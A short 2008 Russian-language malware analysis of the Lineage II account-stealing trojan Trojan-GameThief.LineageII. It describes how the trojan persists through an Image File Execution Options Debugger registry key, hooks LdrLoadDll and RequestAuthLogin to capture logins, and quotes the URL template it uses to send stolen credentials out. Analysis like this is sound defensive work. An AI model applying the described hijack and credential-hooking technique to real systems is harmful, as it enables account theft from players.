Trojan-GameThief.LineageII

Имя файла la2hke.exe. Размер 3,44 Кб.
http://www.virustotal.com/ru/analisis/f93ac0456b57fd2f2fae3a1ff081e01b">
Файл накрыт пакером RLPack, снимается за несколько минут.
Непосредственно код трояна начинается с того, что он копирует себя в папку “\Application Data\LineageII.exe” затем в реестре создает ветку “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\l2.exe”, а там ключ Debugger значением которого будет путь до скопированного ранее трояна. Все это позволяет при запуске игры (файла l2.exe) запускать вместо нее троян. Затем игра запускается с флагом SUSPENDED, делается юзермодный перехват функции LdrLoadDll (native функции для LoadLibrary). В перехватчике при загрузке engine.dll делается перехват RequestAuthLogin, ну а затем, когда пользовать введет логин и пароль они вместе с адресом сервера, на котором играет счастливый обладатель трояна, отправляются на сайт
“http://german.zx6.ru/l2/dat1.php?login=%s&pass=%s&server=%s”.
Заметил что, в последнее время трои, ворующие аккаунды в онлайн играх, стали очень популярны (чего стоит один только случай с МКС). Это особенно раздражает, поскольку я эту Lineage в глазе не видел.

2008, GMax
e_gmax@mail.ru